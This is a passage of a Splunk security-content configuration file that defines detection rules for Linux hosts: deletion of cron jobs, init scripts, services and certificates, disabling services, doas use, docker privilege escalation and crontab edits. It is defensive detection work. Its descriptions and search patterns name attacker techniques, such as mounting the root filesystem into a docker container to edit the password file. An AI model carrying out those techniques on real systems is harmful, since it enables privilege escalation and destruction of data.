jobs that might be related to security or to evade some detections. We also saw that this technique can be a good indicator for malware that is trying to wipe or delete several files on the compromised host like the acidrain malware. This anomaly detection can be a good pivot detection to look for process and user doing it why they doing. Take note that this event can be done by administrator so filtering on those possible false positive event is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a deletion of cron job in a linux machine. This technique can be related to an attacker, threat actor or malware to disable scheduled cron jobs that might be related to security or to evade some detections. We also saw that this technique can be a good indicator for malware that is trying to wipe or delete several files on the compromised host like the acidrain malware. This anomaly detection can be a good pivot detection to look for process and user doing it why they doing. Take note that this event can be done by administrator so filtering on those possible false positive event is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Deletion Of Cron Jobs - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Linux cron jobs are deleted on host $dest$ by process GUID- $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Deletion Of Cron Jobs - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path="/etc/cron.*" by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_deletion_of_cron_jobs_filter` [ESCU - Linux Deletion Of Init Daemon Script - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of init daemon script in a linux machine. daemon script that place in /etc/init.d/ is a directory that can start and stop some daemon services in linux machines. attacker may delete or modify daemon script to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a deletion of init daemon script in a linux machine. daemon script that place in /etc/init.d/ is a directory that can start and stop some daemon services in linux machines. attacker may delete or modify daemon script to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Deletion Of Init Daemon Script - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Init daemon script deleted on host $dest$ by process GUID- $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Deletion Of Init Daemon Script - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a deletion of init daemon script in a linux machine. daemon script that place in /etc/init.d/ is a directory that can start and stop some daemon services in linux machines. attacker may delete or modify daemon script to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.notable.param.rule_title = Linux Deletion Of Init Daemon Script action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path IN ( "/etc/init.d/*") by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_deletion_of_init_daemon_script_filter` [ESCU - Linux Deletion Of Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of services in a linux machine. attacker may delete or modify services to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a deletion of services in a linux machine. attacker may delete or modify services to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Deletion Of Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "AcidRain", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A services file $file_name$ deteted on host $dest$ by process GUID - $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Deletion Of Services - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "AcidRain", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to detect a deletion of services in a linux machine. attacker may delete or modify services to impair some security features or act as defense evasion in a compromised linux machine. This TTP can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.notable.param.rule_title = Linux Deletion Of Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path IN ( "/etc/systemd/*", "*/lib/systemd/*", "*/run/systemd/*") Filesystem.file_path = "*.service" by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_deletion_of_services_filter` [ESCU - Linux Deletion of SSL Certificate - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of ssl certificate in a linux machine. attacker may delete or modify ssl certificate to impair some security features or act as defense evasion in compromised linux machine. This Anomaly can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a deletion of ssl certificate in a linux machine. attacker may delete or modify ssl certificate to impair some security features or act as defense evasion in compromised linux machine. This Anomaly can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Deletion of SSL Certificate - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain"] action.risk = 1 action.risk.param._risk_message = SSL certificate deleted on host $dest$ by process GUID- $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Deletion of SSL Certificate - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted Filesystem.file_path = "/etc/ssl/certs/*" Filesystem.file_path IN ("*.pem", "*.crt") by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_deletion_of_ssl_certificate_filter` [ESCU - Linux Disable Services - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is to detect events that attempts to disable a service. This is typically identified in parallel with other instances of service enumeration of attempts to stop a service and then delete it. Adversaries utilize this technique like industroyer2 malware to terminate security services or other related services to continue there objective as a destructive payload. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is to detect events that attempts to disable a service. This is typically identified in parallel with other instances of service enumeration of attempts to stop a service and then delete it. Adversaries utilize this technique like industroyer2 malware to terminate security services or other related services to continue there objective as a destructive payload. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Disable Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to disable services on endpoint $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Disable Services - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is to detect events that attempts to disable a service. This is typically identified in parallel with other instances of service enumeration of attempts to stop a service and then delete it. Adversaries utilize this technique like industroyer2 malware to terminate security services or other related services to continue there objective as a destructive payload. action.notable.param.rule_title = Linux Disable Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("systemctl", "service", "svcadm") Processes.process = "* disable*" by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_disable_services_filter` [ESCU - Linux Doas Conf File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect the creation of doas.conf file in linux host platform. This configuration file can be use by doas utility tool to allow or permit standard users to perform tasks as root, the same way sudo does. This tool is developed as a minimalistic alternative to sudo application. This tool can be abused advesaries, attacker or malware to gain elevated privileges to the targeted or compromised host. On the other hand this can also be executed by administrator for a certain task that needs admin rights. In this case filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect the creation of doas.conf file in linux host platform. This configuration file can be use by doas utility tool to allow or permit standard users to perform tasks as root, the same way sudo does. This tool is developed as a minimalistic alternative to sudo application. This tool can be abused advesaries, attacker or malware to gain elevated privileges to the targeted or compromised host. On the other hand this can also be executed by administrator for a certain task that needs admin rights. In this case filter is needed. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-05 action.escu.modification_date = 2022-01-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Doas Conf File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Doas Conf File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/doas.conf") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_doas_conf_file_creation_filter` [ESCU - Linux Doas Tool Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. This tool is developed as a minimalistic alternative to sudo application. This tool can be abused advesaries, attacker or malware to gain elevated privileges to the targeted or compromised host. On the other hand this can also be executed by administrator for a certain task that needs admin rights. In this case filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. This tool is developed as a minimalistic alternative to sudo application. This tool can be abused advesaries, attacker or malware to gain elevated privileges to the targeted or compromised host. On the other hand this can also be executed by administrator for a certain task that needs admin rights. In this case filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2022-01-05 action.escu.modification_date = 2022-01-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Doas Tool Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A doas $process_name$ with commandline $process$ was executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Doas Tool Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "doas" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_doas_tool_execution_filter` [ESCU - Linux Docker Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Docker is an open source containerization platform. It helps programmers to bundle applications into containers, which are standardized executable parts that include the application source code along with the OS libraries and dependencies needed to run that code in any setting. The user can add mount the root directory into a container and edit the /etc/password file to add a super user. This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Docker is an open source containerization platform. It helps programmers to bundle applications into containers, which are standardized executable parts that include the application source code along with the OS libraries and dependencies needed to run that code in any setting. The user can add mount the root directory into a container and edit the /etc/password file to add a super user. This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives are present based on automated tooling or system administrative usage. Filter as needed. action.escu.creation_date = 2022-07-31 action.escu.modification_date = 2022-07-31 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Docker Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 5}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 5}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Docker Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN("*docker*-v*/*:*","*docker*--volume*/*:*") OR Processes.process IN("*docker*exec*sh*","*docker*exec*bash*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_docker_privilege_escalation_filter` [ESCU - Linux Edit Cron Table Parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the suspicious editing of cron jobs in Linux via the crontab command-line parameter. This tactic could be used by adversaries or malware to schedule execution of their malicious code, potentially leading to system compromise or unauthorized persistent access. It pinpoints this activity by monitoring command-line executions involving 'crontab' and the edit parameter (-e).\ Recognizing such activity is vital for a SOC as cron job manipulations might signal unauthorized persistence attempts or scheduled malicious actions, potentially resulting in substantial harm. A true positive signifies an active threat, with implications ranging from unauthorized access to broader network compromise.\ To implement this analytic, logs capturing process name, parent process, and command-line executions from your endpoints must be ingested.\ Known false positives could stem from valid administrative tasks or automation processes using crontab. To reduce these, fine-tune the filter macros according to the benign activities within your environment. These adjustments ensure legitimate actions aren't mistaken for threats, allowing analysts to focus on genuine potential risks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the suspicious editing of cron jobs in Linux via the crontab command-line parameter. This tactic could be used by adversaries or malware to schedule execution of their malicious code, potentially leading to system compromise or unauthorized persistent access. It pinpoints this activity by monitoring command-line executions involving 'crontab' and the edit parameter (-e).\ Recognizing such activity is vital for a SOC as cron job manipulations might signal unauthorized persistence attempts or scheduled malicious actions, potentially resulting in substantial harm. A true positive signifies an active threat, with implications ranging from unauthorized access to broader network compromise.\ To implement this analytic, logs capturing process name, parent process, and command-line executions from your endpoints must be ingested.\ Known false positives could stem from valid administrative tasks or automation processes using crontab. To reduce these, fine-tune the filter macros according to the benign activities within your environment. These adjustments ensure legitimate actions aren't mistaken for threats, allowing analysts to focus on genuine potential risks. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-17 action.escu.modification_date = 2021-12-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Edit Cron Table Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Edit Cron Table Parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 30, "impact": 30, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = crontab Processes.process = "*crontab *" Processes.process = "* -e*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | 